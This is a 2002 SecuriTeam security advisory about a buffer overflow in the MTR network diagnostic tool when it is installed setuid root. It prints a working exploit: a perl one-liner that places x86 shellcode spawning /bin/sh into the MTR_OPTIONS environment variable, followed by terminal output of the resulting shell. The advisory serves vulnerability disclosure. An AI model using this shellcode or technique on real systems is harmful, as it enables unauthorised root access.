[EXPL] MTR Allows Local Users to Gain Root Privileges

From: support@securiteam.com
Date: 03/09/02


From: support@securiteam.com
To: list@securiteam.com
Date: Sat,  9 Mar 2002 11:54:06 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  MTR Allows Local Users to Gain Root Privileges
------------------------------------------------------------------------

SUMMARY

 <http://www.bitwizard.nl/mtr/> MTR is a network diagnostic tool that
combines 'ping' and 'traceroute' into one program. A security
vulnerability in the product allows a local user to execute arbitrary code
and gain elevated privileges when the binary is installed setuid root. It
should be noted that MTR's author does not recommend that the program be
executed as setuid root.

DETAILS

Exploit code:
The sample exploit is TRIVIAL because of the strtok/while loop in the
vulnerable code.

$ uname -smr
Linux 2.4.8-26mdk i686
$ setenv MTR_OPTIONS `perl -e 'print "A "x130 . "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"'`
$ ./mtr
sh-2.05$

At this point, the exec'd shell still has MTR's raw sockets open:

$ /usr/sbin/lsof | grep raw
sh 17263 venglin 3u raw 605400 00000000:00FF->00000000:0000 st=07
sh 17263 venglin 4u raw 605401 00000000:0001->00000000:0000 st=07
sh-2.05$ ls -la /proc/self/fd/
total 0
dr-x------ 2 venglin venglin 0 Mar 6 15:40 .
dr-xr-xr-x 3 venglin venglin 0 Mar 6 15:40 ..
lrwx------ 1 venglin venglin 64 Mar 6 15:40 0 -> /dev/pts/6
lrwx------ 1 venglin venglin 64 Mar 6 15:40 1 -> /dev/pts/6
lrwx------ 1 venglin venglin 64 Mar 6 15:40 2 -> /dev/pts/6
lrwx------ 1 venglin venglin 64 Mar 6 15:40 3 -> socket:[605400]
lrwx------ 1 venglin venglin 64 Mar 6 15:40 4 -> socket:[605401]
lr-x------ 1 venglin venglin 64 Mar 6 15:40 5 -> /proc/17318/fd

ADDITIONAL INFORMATION

The information has been provided by <mailto:venglin@freebsd.lublin.pl>
Przemyslaw Frasunek.
